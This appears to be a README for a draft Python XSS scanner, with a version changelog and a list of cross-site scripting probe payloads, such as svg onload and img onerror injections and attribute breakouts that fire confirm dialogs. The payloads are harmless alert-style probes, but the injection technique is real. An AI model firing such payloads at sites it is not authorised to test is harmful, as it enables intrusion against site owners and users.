Little tool to look for XSS vulnerabilities in a web page.
This code is just a draft. There are some errors still to be corrected, and sometimes false positives occur.
Test with Python 2.7.9 on Debian Jessie. I'll write it for Python 3.x maybe.
0.1.6
[-] Fixed some bugs
[-] Added scan on list of POST parameters
[-] Added option to assign default value to a POST parameter
[-] Added help function
0.1.5a
[-] Fixed some bugs
[-] Less than 400 lines of code
0.1.5
[-] Added scan on POST parameters
[-] Changed name
0.1.4a
[-] Added stopwatch to know the time spent to check each URL
[-] Same features with 1500 lines of code missing
0.1.4
[-] Check a single URL or a list.txt of sites
'">"'><img src=x onerror=confirm`XSS`>
"> <script>alert`XSS`</script>
'">"'><svg onload=confirm`XSS`>
"',;</script><script>confirm`XSS`</script>
'><svg onload=confirm`XSS`>
"><svg/onload=confirm`XSS`//
"><details/open/ontoggle=confirm`XSS`>
" onfocus="confirm`XSS`" autofocus=""
" onclick="confirm`XSS`"
" onmouseover="confirm`XSS`"
\"-confirm`XSS`//
\'-confirm`XSS`//
"-confirm`XSS`-"'-confirm`XSS`-'
pip install fake-useragent
python xsssonar.py